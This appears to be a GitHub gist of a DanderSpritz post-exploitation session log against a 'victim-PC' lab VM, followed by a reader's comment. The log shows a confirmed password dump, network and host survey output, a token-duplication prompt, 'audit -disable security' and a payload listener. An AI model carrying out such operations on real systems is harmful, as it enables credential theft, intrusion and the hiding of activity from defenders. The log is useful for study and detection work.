| SERVICE | COM job ClassID and data: {900BE39D-6BE8-461A-BC4D-B0FA71F5ECB1} - | | | HIGHEST | WDI\ResolutionHost |
| SERVICE | %%%%windir%%%%\system32\wermgr.exe -queuereporting (runs in "") | LOGON | LOGON | LEAST | Windows Error Reporting\QueueReporting |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange (runs in "") | EVENT | EVENT | SYSTEM LEAST | Windows Filtering Platform\BfeOnServiceStartTypeChange |
| SERVICE | "%%%%ProgramFiles%%%%\Windows Media Player\wmpnscfg.exe" (runs in "") | EVENT | EVENT | LEAST | Windows Media Sharing\UpdateLibrary |
| SERVICE | %%%%systemroot%%%%\System32\sdclt.exe /CONFIGNOTIFICATION (runs in "") | DAILY 2010-11-27T10:00:00 | DAILY 2010-11-27T10:00:00 | LOCAL SERVICE LEAST | WindowsBackup\ConfigNotification |
| SERVICE | c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan (runs in "") | DAILY 2000-01-01T04:09:42 2100-01-01T00:00:00 | DAILY 2000-01-01T04:09:42 2100-01-01T00:00:00 | SYSTEM HIGHEST | Windows Defender\MP Scheduled Scan |
- [2017-04-15 16:02:34 z0.0.0.13] =============================== Persistence checks ===============================================================
- | Path/Key | File/Value | Data |
- +------------------------------------------------------------+---------------+------------------------------------------+
- | system\currentcontrolset\Services\tcpip\Parameters\Winsock | HelperDllName | %%%%SystemRoot%%%%\System32\wshtcpip.dll |
- | Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_Dlls | |
- | Software\Microsoft\Windows NT\CurrentVersion\winlogon | Shell | explorer.exe |
- | Software\Microsoft\Windows NT\CurrentVersion\winlogon | Userinit | C:\Windows\system32\userinit.exe, |
- [2017-04-15 16:02:36 z0.0.0.13] Saved safety handlers for future op(s)
- [2017-04-15 16:02:37 z0.0.0.13] ================================== Password dump ==================================================================
- [2017-04-15 16:02:37 z0.0.0.13] 1 safety handler registered for passworddump
I think it's safe to run passworddump. Do you want to run it?
YES
- [2017-04-15 16:02:52 z0.0.0.13] ================================= OS information =================================================================
- [2017-04-15 16:02:52 z0.0.0.13] Data age: 24:44 (from local cache, re-run manually if you need to)
- OS installed on Sat Apr 15 00:34:19 2017
- System language settings
Locale: English (USA)
Installed: English (USA)
UI: English (USA)
OS: English (USA)
- System version information
Version: 6.1.1.0 Build 7601 winnt i386 Service Pack 1
- [2017-04-15 16:02:53 z0.0.0.13] ============================= Networking Information =============================================================
FQDN: victim-PC
DNS Servers: 195.130.131.1, 195.130.130.1
- [2017-04-15 16:02:53 z0.0.0.13] Showing all non-local and non-tunnel encapsulation adapter information, see command 1206 for full interface list
| Description | MAC | IP | Netmask | Gateway | DHCP Server | Name |
+--------------------------------------+-------------------+---------------+---------------+---------------------------------+-------------+----------------------------------------------------------------+
| Intel(R) PRO/1000 MT Desktop Adapter | 08-00-27-BB-EF-C8 | 192.168.0.249 | 255.255.255.0 | fe80::de53:7cff:fef2:b96e%%%%11 | 192.168.0.1 | Local Area Connection ({C63B0135-2C21-412E-92E7-A6FEB149081E}) |
- ------------------------------------------------------------------- Route table -------------------------------------------------------------------
- [2017-04-15 16:02:53 z0.0.0.13] Data age: 24:43 (from local cache, re-run manually if you need to)
| Dest. network | Mask | Gateway | Interface | Metric | Origin |
+-----------------------------------------+-----------------+---------------------------+---------------+--------+-----------+
| 0.0.0.0 | 0.0.0.0 | 192.168.0.1 | 192.168.0.249 | 10 | MANUAL |
| 127.0.0.0 | 255.0.0.0 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
| 127.0.0.1 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
| 127.255.255.255 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
| 192.168.0.0 | 255.255.255.0 | 0.0.0.0 | 192.168.0.249 | 266 | MANUAL |
| 192.168.0.249 | 255.255.255.255 | 0.0.0.0 | 192.168.0.249 | 266 | MANUAL |
| 192.168.0.255 | 255.255.255.255 | 0.0.0.0 | 192.168.0.249 | 266 | MANUAL |
| 224.0.0.0 | 240.0.0.0 | 0.0.0.0 | 127.0.0.1 | 306 | WELLKNOWN |
| 224.0.0.0 | 240.0.0.0 | 0.0.0.0 | 192.168.0.249 | 266 | WELLKNOWN |
| 255.255.255.255 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
| 255.255.255.255 | 255.255.255.255 | 0.0.0.0 | 192.168.0.249 | 266 | MANUAL |
| :: | 0 | fe80::de53:7cff:fef2:b96e | 192.168.0.249 | 26 | ROUTER_AD |
| ::1 | 128 | :: | 127.0.0.1 | 306 | MANUAL |
| 2001:: | 32 | :: | | 8 | ROUTER_AD |
| 2001:0:9d38:6abd:488:1cb2:ae5b:d867 | 128 | :: | | 256 | MANUAL |
| 2a02:1811:241e:5c00:: | 64 | :: | 192.168.0.249 | 18 | ROUTER_AD |
| 2a02:1811:241e:5c00:: | 64 | fe80::de53:7cff:fef2:b96e | 192.168.0.249 | 266 | ROUTER_AD |
| 2a02:1811:241e:5c00:301a:5a76:66cf:2906 | 128 | :: | 192.168.0.249 | 266 | MANUAL |
| 2a02:1811:241e:5c00:4862:ad35:9a1d:cbc | 128 | :: | 192.168.0.249 | 266 | MANUAL |
| fe80:: | 64 | :: | 192.168.0.249 | 266 | MANUAL |
| fe80:: | 64 | :: | | 256 | MANUAL |
| fe80::5efe:c0a8:f9 | 128 | :: | | 256 | MANUAL |
| fe80::488:1cb2:ae5b:d867 | 128 | :: | | 256 | MANUAL |
| fe80::301a:5a76:66cf:2906 | 128 | :: | 192.168.0.249 | 266 | MANUAL |
| ff00:: | 8 | :: | 127.0.0.1 | 306 | WELLKNOWN |
| ff00:: | 8 | :: | | 256 | WELLKNOWN |
| ff00:: | 8 | :: | 192.168.0.249 | 266 | WELLKNOWN |
- -------------------------------------------------------------------- ARP table --------------------------------------------------------------------
- [2017-04-15 16:02:53 z0.0.0.13] Data age: 24:42 (from local cache, re-run manually if you need to)
| IP | Type | Interface | MAC |
+-------------------------------------+------+---------------+-------------------------------------------+
| 224.0.0.22 | | 127.0.0.1 | |
| 239.255.255.250 | | 127.0.0.1 | |
| 192.168.0.1 | | 192.168.0.249 | DC-53-7C-F2-B9-6E |
| 192.168.0.114 | | 192.168.0.249 | 5C-E0-C5-5A-05-5F |
| 192.168.0.118 | | 192.168.0.249 | 08-00-27-A0-13-50 |
| 192.168.0.255 | | 192.168.0.249 | FF-FF-FF-FF-FF-FF |
| 224.0.0.22 | | 192.168.0.249 | 01-00-5E-00-00-16 |
| 224.0.0.252 | | 192.168.0.249 | 01-00-5E-00-00-FC |
| 224.0.0.253 | | 192.168.0.249 | 01-00-5E-00-00-FD |
| 239.255.255.250 | | 192.168.0.249 | 01-00-5E-7F-FF-FA |
| 255.255.255.255 | | 192.168.0.249 | FF-FF-FF-FF-FF-FF |
| ff02::c | | 127.0.0.1 | |
| ff02::16 | | 127.0.0.1 | |
| ff02::1:2 | | 127.0.0.1 | |
| 2001:0:9d38:6abd:4af:37e6:ae5b:d867 | | | 00-00-00-00-00-00-04-AF-37-E6-3F-57-FF-89 |
| ff02::2 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 |
| ff02::16 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 |
| ff02::1:2 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 |
| ff02::1:ff5b:d867 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 |
| fe80::ac72:89df:85b6:949b | | 192.168.0.249 | 08-00-27-A0-13-50 |
| fe80::de53:7cff:fef2:b96e | | 192.168.0.249 | DC-53-7C-F2-B9-6E |
| ff02::2 | | 192.168.0.249 | 33-33-00-00-00-02 |
| ff02::c | | 192.168.0.249 | 33-33-00-00-00-0C |
| ff02::16 | | 192.168.0.249 | 33-33-00-00-00-16 |
| ff02::1:2 | | 192.168.0.249 | 33-33-00-01-00-02 |
| ff02::1:3 | | 192.168.0.249 | 33-33-00-01-00-03 |
| ff02::1:ff1d:cbc | | 192.168.0.249 | 33-33-FF-1D-0C-BC |
| ff02::1:ffb6:949b | | 192.168.0.249 | 33-33-FF-B6-94-9B |
| ff02::1:ffcf:2906 | | 192.168.0.249 | 33-33-FF-CF-29-06 |
| ff02::1:fff2:b96e | | 192.168.0.249 | 33-33-FF-F2-B9-6E |
- ----------------------------------------------------- Getting the pipelist in the background -----------------------------------------------------
- --------------------------------------------------------------------- NETBIOS ---------------------------------------------------------------------
Running command 'netbios '
---------------------------------------------------------------------
VICTIM-PC UNIQUE REGISTERED File Server Service
VICTIM-PC UNIQUE REGISTERED Workstation Service
WORKGROUP GROUP REGISTERED Domain Name
WORKGROUP GROUP REGISTERED Browser Service Elections
Adapter Address: 08.00.27.bb.ef.c8
Adapter Type : Ethernet Adapter
Command completed successfully
Do you want to run background netmap -minimal?
YES
- Netmap will require user credentials (and probably won't work on 2K8)
- If you want to run netmap, you have to go run "duplicatetoken -duplicate" or logonasuser for me
Do you want to do this?
NO
- [2017-04-15 16:03:57 z0.0.0.13] Can't get netmap without creds
- [2017-04-15 16:03:58 z0.0.0.13] ============================ Memory usage information ============================================================
- [2017-04-15 16:03:58 z0.0.0.13] 1 safety handler registered for memory
- [2017-04-15 16:03:58 z0.0.0.13] Data age: 25:29 (from local cache, re-run manually if you need to)
- Memory Load : 52%%
- Physical Available: 240 M
- Physical Total : 511 M
- [2017-04-15 16:03:59 z0.0.0.13] ============================ Disk list and space info ============================================================
- [2017-04-15 16:03:59 z0.0.0.13] Data age: 25:28 (from local cache, re-run manually if you need to)
| Drive | Serial | Type | In use (MB) | Change (MB) |
+-------+-----------+-------+--------------------+-------------+
| C | f008-53db | Fixed | 10473/15256 (68%%) | 0 |
| D | | Cdrom | | |
- [2017-04-15 16:04:00 z0.0.0.13] ================================= USB survey info =================================================================
- [2017-04-15 16:04:00 z0.0.0.13] System\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b} data is only 0:25:25.829000 old, was not re-run
- [2017-04-15 16:04:00 z0.0.0.13] SYSTEM\CurrentControlSet\Enum\USB data is only 0:25:24.881000 old, was not re-run
- [2017-04-15 16:04:00 z0.0.0.13] SYSTEM\CurrentControlSet\Enum\USBSTOR not found
- [2017-04-15 16:04:00 z0.0.0.13] Showing recent USB devices
[2017-04-16 03:50:02] ##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
[2009-07-14 04:52:51] ##?#SCSI#Disk&Ven_Dell&Prod_VIRTUAL_DISK#6&17b13437&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
[2010-11-20 21:47:52] ##?#SCSI#Disk&Ven_Dell&Prod_VIRTUAL_DISK#6&3af2ddc5&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
- [2017-04-15 16:04:02 z0.0.0.13] User info started in the background as command ID 1371.
- [2017-04-15 16:04:03 z0.0.0.13] Extra info to get started in the background as command ID 1372.
Running command 'python diffhour.py -args "-safe -sysdrive -recursive"'
- [2017-04-15 16:04:06 z0.0.0.13] Recording initial data, running "dir -mask "*" -path C: -age 1h -recursive"
- [2017-04-15 16:04:06 z0.0.0.13] Running dir -path C: -after "2017-04-15 13:04:08" -mask "*" -recursive -before "2017-04-15 14:04:08"
- [2017-04-15 16:04:16 z0.0.0.13] No changes detected
Command completed successfully
- [2017-04-15 16:04:17 z0.0.0.13] Commands currently running in the background:
| ID | Target | Full Command | Sent | Received |
+------+-----------+--------------------------------------------------------------------------------------------------------+------+----------+
| 1129 | z0.0.0.13 | keepalive -delay 1m | 109 | 0 |
| 1196 | z0.0.0.13 | script Connected/Connected.dss | 0 | 0 |
| 1197 | z0.0.0.13 | python Connected/Connected.py -project Ops | 0 | 0 |
| 1216 | z0.0.0.13 | python survey.py -args " -run " | 0 | 0 |
| 1220 | z0.0.0.13 | background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s "processes -monitor " " | 0 | 0 |
| 1221 | z0.0.0.13 | background log=monitor guiflag=monitor processes -monitor | 236 | 981 |
| 1237 | z0.0.0.13 | stopaliasing dst=z0.0.0.13 audit -disable security | 152 | 14 |
Command completed successfully
Command completed successfully
Command completed successfully
Command completed successfully
[23:04:18] Backgrounded 'pc_listen -key "Default" -payload "Danderspritz" -run "memlib" -tcp "443 80 53 1509" -autoaccept ' Id: 1125
[23:04:18] ID: 1377 '/Local-Only-Command' started [default target: z0.0.0.13]
* Command '/local-only-command' not found
*** Command indicated failure ***
@d78ui98

This comment has been minimized.

Copy link

d78ui98 commented May 13, 2017

does danderspritz have any interesting commands like in meterpreter shell?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.